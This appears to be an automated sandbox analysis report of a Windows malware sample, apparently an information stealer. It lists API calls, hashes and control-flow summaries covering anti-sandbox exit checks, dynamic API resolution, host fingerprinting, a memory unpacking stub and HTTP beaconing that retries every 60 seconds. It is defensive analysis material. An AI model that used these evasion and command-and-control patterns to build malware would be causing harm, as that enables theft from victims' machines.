                                            • API ID: Heap$AllocNameProcessUser
                                            • String ID:
                                            • API String ID: 1206570057-0
                                            • Opcode ID: 7e9e81e1a1689cb1da455be5f83933a8c8cca94e355bd3ccc2ffb479564026f7
                                            • Instruction ID: 9b82aaaa51ecd1631f431d3f1c3dae0ecd6dc6cababe86b84151973db8bb3773
                                            • Opcode Fuzzy Hash: 7e9e81e1a1689cb1da455be5f83933a8c8cca94e355bd3ccc2ffb479564026f7
                                            • Instruction Fuzzy Hash: 80F04FB1D49249EBC700DF98DD45BAEBBB8EB45711F10021BF615A2680D7755640CBA1
                                            APIs
                                            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416CB7,00420AF3), ref: 0040116A
                                            • ExitProcess.KERNEL32 ref: 0040117E
                                            Yara matches
                                            Similarity
                                            • API ID: ExitInfoProcessSystem
                                            • String ID:
                                            • API String ID: 752954902-0
                                            • Opcode ID: 0911bb23926965f42d7cc1f5d35b7be77a6f2882a7c2442a84db88c73d1ba697
                                            • Instruction ID: 7de8415141d8ede1392e5156f4839a36e98c975bb62c62673ce2cce929d499c4
                                            • Opcode Fuzzy Hash: 0911bb23926965f42d7cc1f5d35b7be77a6f2882a7c2442a84db88c73d1ba697
                                            • Instruction Fuzzy Hash: 9ED05E74D0530DABCB04DFE09D496DDBB79BB0C315F041656DD0572240EA305441CA66

                                            Control-flow Graph
                                            • Graph rendering (blocks marked Executed / Not Executed) not recoverable as text; entry block 419bb0-419bc4, and the block labels show repeated GetProcAddress calls and five LoadLibraryA calls.
                                            APIs
                                            • GetProcAddress.KERNEL32(74DD0000,009C2798), ref: 00419BF1
                                            • GetProcAddress.KERNEL32(74DD0000,009C27C8), ref: 00419C0A
                                            • GetProcAddress.KERNEL32(74DD0000,009C2A20), ref: 00419C22
                                            • GetProcAddress.KERNEL32(74DD0000,009C2A08), ref: 00419C3A
                                            • GetProcAddress.KERNEL32(74DD0000,009C2990), ref: 00419C53
                                            • GetProcAddress.KERNEL32(74DD0000,009C93C0), ref: 00419C6B
                                            • GetProcAddress.KERNEL32(74DD0000,009C61B8), ref: 00419C83
                                            • GetProcAddress.KERNEL32(74DD0000,009C6258), ref: 00419C9C
                                            • GetProcAddress.KERNEL32(74DD0000,009C2A38), ref: 00419CB4
                                            • GetProcAddress.KERNEL32(74DD0000,009C2A50), ref: 00419CCC
                                            • GetProcAddress.KERNEL32(74DD0000,009C29A8), ref: 00419CE5
                                            • GetProcAddress.KERNEL32(74DD0000,009C29C0), ref: 00419CFD
                                            • GetProcAddress.KERNEL32(74DD0000,009C6418), ref: 00419D15
                                            • GetProcAddress.KERNEL32(74DD0000,009C29D8), ref: 00419D2E
                                            • GetProcAddress.KERNEL32(74DD0000,009C29F0), ref: 00419D46
                                            • GetProcAddress.KERNEL32(74DD0000,009C6378), ref: 00419D5E
                                            • GetProcAddress.KERNEL32(74DD0000,009C98A0), ref: 00419D77
                                            • GetProcAddress.KERNEL32(74DD0000,009C9870), ref: 00419D8F
                                            • GetProcAddress.KERNEL32(74DD0000,009C6178), ref: 00419DA7
                                            • GetProcAddress.KERNEL32(74DD0000,009C9948), ref: 00419DC0
                                            • GetProcAddress.KERNEL32(74DD0000,009C6198), ref: 00419DD8
                                            • LoadLibraryA.KERNEL32(009C9A98,?,00416CA0), ref: 00419DEA
                                            • LoadLibraryA.KERNEL32(009C9900,?,00416CA0), ref: 00419DFB
                                            • LoadLibraryA.KERNEL32(009C9918,?,00416CA0), ref: 00419E0D
                                            • LoadLibraryA.KERNEL32(009C9828,?,00416CA0), ref: 00419E1F
                                            • LoadLibraryA.KERNEL32(009C99C0,?,00416CA0), ref: 00419E30
                                            • GetProcAddress.KERNEL32(75A70000,009C97C8), ref: 00419E52
                                            • GetProcAddress.KERNEL32(75290000,009C97F8), ref: 00419E73
                                            • GetProcAddress.KERNEL32(75290000,009C9AB0), ref: 00419E8B
                                            • GetProcAddress.KERNEL32(75BD0000,009C9A20), ref: 00419EAD
                                            • GetProcAddress.KERNEL32(75450000,009C6358), ref: 00419ECE
                                            • GetProcAddress.KERNEL32(76E90000,009C94C0), ref: 00419EEF
                                            • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00419F06
                                            Strings
                                            • NtQueryInformationProcess, xrefs: 00419EFA
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$LibraryLoad
                                            • String ID: NtQueryInformationProcess
                                            • API String ID: 2238633743-2781105232
                                            • Opcode ID: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                            • Instruction ID: 85c76ffc39373860cb8090e471c59d53cf6ad49422061259caa86ebb7f60cad9
                                            • Opcode Fuzzy Hash: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                            • Instruction Fuzzy Hash: 4DA16FB5D0A2549FC344DFA8FC889567BBBA74D301708A61BF909C3674E734AA40CF62

                                            Control-flow Graph
                                            • Graph rendering (blocks marked Executed / Not Executed) not recoverable as text; entry block 4062d0-40635b, and the block labels show calls to InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, HttpSendRequestA, HttpQueryInfoA, InternetReadFile and InternetCloseHandle.
                                            APIs
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                              • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                              • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
                                            • StrCmpCA.SHLWAPI(?,009D1ED0), ref: 00406353
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                            • HttpOpenRequestA.WININET(00000000,GET,?,009D1218,00000000,00000000,00400100,00000000), ref: 004063D5
                                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0040644D
                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004064BD
                                            • InternetCloseHandle.WININET(00000000), ref: 0040653F
                                            • InternetCloseHandle.WININET(00000000), ref: 00406549
                                            • InternetCloseHandle.WININET(00000000), ref: 00406553
                                            Strings
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                            • String ID: ERROR$ERROR$FUA$GET
                                            • API String ID: 3074848878-1334267432
                                            • Opcode ID: f3f7255e0d2dc24356a6d92e3ef249651165f71d209c9760ff987d984a1e72ad
                                            • Instruction ID: e13f8b4f5a4983f25bfc964ce73e77e76ffbf3c7ad5d81db2c216f4c68459c1c
                                            • Opcode Fuzzy Hash: f3f7255e0d2dc24356a6d92e3ef249651165f71d209c9760ff987d984a1e72ad
                                            • Instruction Fuzzy Hash: 33718171A00218ABDB14DF90DC59FEEB775AF44304F1081AAF6067B1D4DBB86A84CF59

                                            Control-flow Graph
                                            • Graph rendering (blocks marked Executed / Not Executed) not recoverable as text; entry block 4119f0-411a1d, and the block labels show calls to StrCmpCA, strtok_s and ExitProcess.
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcessstrtok_s
                                            • String ID: block
                                            • API String ID: 3407564107-2199623458
                                            • Opcode ID: 1f0f84f1c6c132a16ad49c43e162cf8975f1175bc1bc8b8d234cf50fd6cc2e6d
                                            • Instruction ID: 24cedd258c0b2a3a786e48f87e23423129f016670b7ad46fccbec0895e921d59
                                            • Opcode Fuzzy Hash: 1f0f84f1c6c132a16ad49c43e162cf8975f1175bc1bc8b8d234cf50fd6cc2e6d
                                            • Instruction Fuzzy Hash: 00513174B0A109DFCB04DF94D984FEE77B9AF44704F10405AE502AB261E778EA91CB5A

                                             Control-flow Graph

                                             sub_415760 (basic blocks 415760–415d16; the rendered graph is not reproduced here). Recoverable structure: three sequential stages starting at 4157cc, 4158ff and 415ab5, each building a request through sub_41AB30/sub_41AA50, sub_401590 and sub_415440 or sub_415510 and then comparing the result with StrCmpCA against "ERROR" (see APIs below); a failed comparison in a stage leaves through a cleanup path (sub_41ABB0, sub_41AB30, sub_4016B0, sub_41AB10, sub_401670, sub_401550) to the return at 415d13. The final comparison at 415bdf–415c64 is the retry point: on "ERROR" the function calls Sleep(0xEA60 = 60000 ms) at 415c66 and jumps back to 4157cc, otherwise it falls through to the return.
                                            APIs
                                              • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,009C9490,?,004210F4,?,00000000), ref: 0041AB3B
                                              • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415894
                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004158F1
                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415AA7
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 00415440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415478
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 00415510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415568
                                              • Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 0041557F
                                              • Part of subcall function 00415510: StrStrA.SHLWAPI(00000000,00000000), ref: 004155B4
                                              • Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 004155D3
                                              • Part of subcall function 00415510: strtok.MSVCRT(00000000,?), ref: 004155EE
                                              • Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 004155FE
                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004159DB
                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415B90
                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415C5C
                                            • Sleep.KERNEL32(0000EA60), ref: 00415C6B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpylstrlen$Sleepstrtok
                                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                            • API String ID: 3630751533-2791005934
                                            • Opcode ID: 93186e085ff129a73f9e0ab74c49d77d7277fa139757a84e451318394f26fa84
                                            • Instruction ID: 55671caa9f17e02bf2b096751d64d2e50591885947f125be0164830bf8637258
                                            • Opcode Fuzzy Hash: 93186e085ff129a73f9e0ab74c49d77d7277fa139757a84e451318394f26fa84
                                            • Instruction Fuzzy Hash: 30E1A331A111049BCB14FBA1EDA6EED733EAF54304F40856EF50666091EF386B98CB5A

                                             Control-flow Graph

                                             sub_417690 (basic blocks 417690–41781e; the rendered graph is not reproduced here). Recoverable structure: GetWindowsDirectoryA at entry, then GetVolumeInformationA followed by three calls to sub_418E90 (and a further call to sub_418E90 in the small loop at 417771–41778a), then GetProcessHeap/HeapAlloc at 41778c; if the allocation succeeds, wsprintfA formats into the new buffer before sub_41AA50 is called (4177b8), otherwise sub_41AA50 is called directly (4177a9); both paths join at 41780e. The strings ":", "C" and "\" listed under Similarity are the only literals referenced.
                                            APIs
                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004176D2
                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041770F
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417793
                                            • HeapAlloc.KERNEL32(00000000), ref: 0041779A
                                            • wsprintfA.USER32 ref: 004177D0
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                            • String ID: :$C$\
                                            • API String ID: 3790021787-3809124531
                                            • Opcode ID: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
                                            • Instruction ID: 56630df3f9a1121e358c86d43682af9e85f8bbcd47ea8763ba8f74f533c9f43c
                                            • Opcode Fuzzy Hash: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
                                            • Instruction Fuzzy Hash: 8541B6B1D05358DBDB10DF94CC45BDEBBB8AF48704F10009AF509A7280D7786B84CBA9

                                             Control-flow Graph

                                             Code at 245003c (basic blocks 245003c–245091d in the 0x2450000 region, which the memory dump records as not backed by a PE; the rendered graph is not reproduced here). Recoverable structure: helper calls to 2450a3f, 2450e0f and 2450d90, then VirtualAlloc at 245024d (MEM_COMMIT, PAGE_READWRITE per the APIs entry), a copy loop at 24502a1–24502cc, VirtualProtect at 24502ce with calls to 2450cce and 2450ce7, a second loop over 2450ce7 at 24503d1–2450437, VirtualFree at 2450439, and two LoadLibraryA calls (24504e3 and 245086e) each followed by table-walking loops; the literals "kernel32.dll" and "cess" are listed under Similarity.
                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0245024D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID: cess$kernel32.dll
                                            • API String ID: 4275171209-1230238691
                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                            • Instruction ID: c9fbaced24b664d85f2f51353405923b56babc5c95e3065eb613141c6d6e0ca0
                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                            • Instruction Fuzzy Hash: 3D525D75A01229DFDB64CF58C985BADBBB1BF09304F1480DAE94DA7352DB30AA85CF14

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009C2798), ref: 00419BF1
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009C27C8), ref: 00419C0A
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009C2A20), ref: 00419C22
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009C2A08), ref: 00419C3A
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009C2990), ref: 00419C53
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009C93C0), ref: 00419C6B
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009C61B8), ref: 00419C83
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009C6258), ref: 00419C9C
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009C2A38), ref: 00419CB4
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009C2A50), ref: 00419CCC
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009C29A8), ref: 00419CE5
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009C29C0), ref: 00419CFD
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009C6418), ref: 00419D15
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009C29D8), ref: 00419D2E
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                              • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416CB7,00420AF3), ref: 0040116A
                                              • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                              • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416CBC), ref: 0040112B
                                              • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416CBC), ref: 00401132
                                              • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                              • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                              • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                              • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                              • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                              • Part of subcall function 00416A10: GetUserDefaultLangID.KERNEL32(?,?,00416CC6,00420AF3), ref: 00416A14
                                            • GetUserDefaultLCID.KERNEL32 ref: 00416CC6
                                              • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                              • Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                              • Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                              • Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                              • Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                              • Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                              • Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,009C9490,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416D6A
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416D88
                                            • CloseHandle.KERNEL32(00000000), ref: 00416D99
                                            • Sleep.KERNEL32(00001770), ref: 00416DA4
                                            • CloseHandle.KERNEL32(?,00000000,?,009C9490,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416DBA
                                            • ExitProcess.KERNEL32 ref: 00416DC2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                            • String ID:
                                            • API String ID: 3511611419-0
                                            • Opcode ID: 32fb34536166014d7c58d27a16746fd28ebf0fa137deb214c181cbfce6898861
                                            • Instruction ID: 27cf1f4c78a26a12fad1801110170cb785a0876a7ac7b1f74ab5ff3c6832b849
                                            • Opcode Fuzzy Hash: 32fb34536166014d7c58d27a16746fd28ebf0fa137deb214c181cbfce6898861
                                            • Instruction Fuzzy Hash: CB315E30A05104ABCB04FBF1EC56BEE7379AF44314F50492FF11266196EF786A85C66E

                                            Control-flow Graph

                                            APIs
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                            • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ??2@$CrackInternetlstrlen
                                            • String ID: <
                                            • API String ID: 1683549937-4251816714
                                            • Opcode ID: 994daec21f0517629ae22a04d51c011e227e96814832a9a45039b376b6c0c140
                                            • Instruction ID: 160db8237089610cf3963e488d7c28046b69bb3d6c402c1973a99714a059ae02
                                            • Opcode Fuzzy Hash: 994daec21f0517629ae22a04d51c011e227e96814832a9a45039b376b6c0c140
                                            • Instruction Fuzzy Hash: 9F2149B1D00219ABDF14DFA5EC4AADD7B75FF04320F008229F925A7290EB706A19CF95

                                             Control-flow Graph

                                             sub_401220 (basic blocks 401220–40129d; the rendered graph is not reproduced here). Recoverable structure: a call to sub_418B40 and GlobalMemoryStatusEx at 40123e (dwLength 0x40); on one path two calls to sub_41DD30 (__aulldiv, unsigned 64-bit division) at 401249–401271; the paths join at 401273 and a comparison at 401281 leads either to ExitProcess at 401292 or to the return at 40129a.
                                            APIs
                                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                            • __aulldiv.LIBCMT ref: 00401258
                                            • __aulldiv.LIBCMT ref: 00401266
                                            • ExitProcess.KERNEL32 ref: 00401294
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                            • String ID: @
                                            • API String ID: 3404098578-2766056989
                                            • Opcode ID: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
                                            • Instruction ID: 198c605b63268064c6e3321c907f2861ebf30c0b4d659eb8408d118d522d9ff8
                                            • Opcode Fuzzy Hash: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
                                            • Instruction Fuzzy Hash: 88014BF0D44308BAEB10DFE0DD4ABAEBB78AB14705F20849EE604B62D0D6785581875D

                                             Control-flow Graph

                                             Code at 416d5a–416dc2 (graph entry 416d93; the rendered graph is not reproduced here). Recoverable structure: a loop headed at 416daa that calls sub_41ADE0 and then OpenEventA (416d5a, desired access 0x1F0003 = EVENT_ALL_ACCESS); if a handle is returned, CloseHandle and Sleep(0x1770 = 6000 ms) at 416d95 and back to 416daa; if not, sub_41ADE0 and CreateEventA (416d79), followed by sub_416BC0, sub_415D60, CloseHandle and ExitProcess (416dac–416dc2).
                                            APIs
                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,009C9490,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416D6A
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416D88
                                            • CloseHandle.KERNEL32(00000000), ref: 00416D99
                                            • Sleep.KERNEL32(00001770), ref: 00416DA4
                                            • CloseHandle.KERNEL32(?,00000000,?,009C9490,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416DBA
                                            • ExitProcess.KERNEL32 ref: 00416DC2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                            • String ID:
                                            • API String ID: 941982115-0
                                            • Opcode ID: d5e1fa89fe7d5108738a6f3c91913c7127e375a878f495bce87c5ec22f141b40
                                            • Instruction ID: 8f12dcb365d2fb80f233d5f720f30c8ba2b1eb9bf2b810d0bdce41a90926edfe
                                            • Opcode Fuzzy Hash: d5e1fa89fe7d5108738a6f3c91913c7127e375a878f495bce87c5ec22f141b40
                                            • Instruction Fuzzy Hash: 46F08230B48219EFEB00BBA0EC0ABFE7375AF04705F15061BB516A51D0DBB89681CA5B
                                            APIs
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 004062D0: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
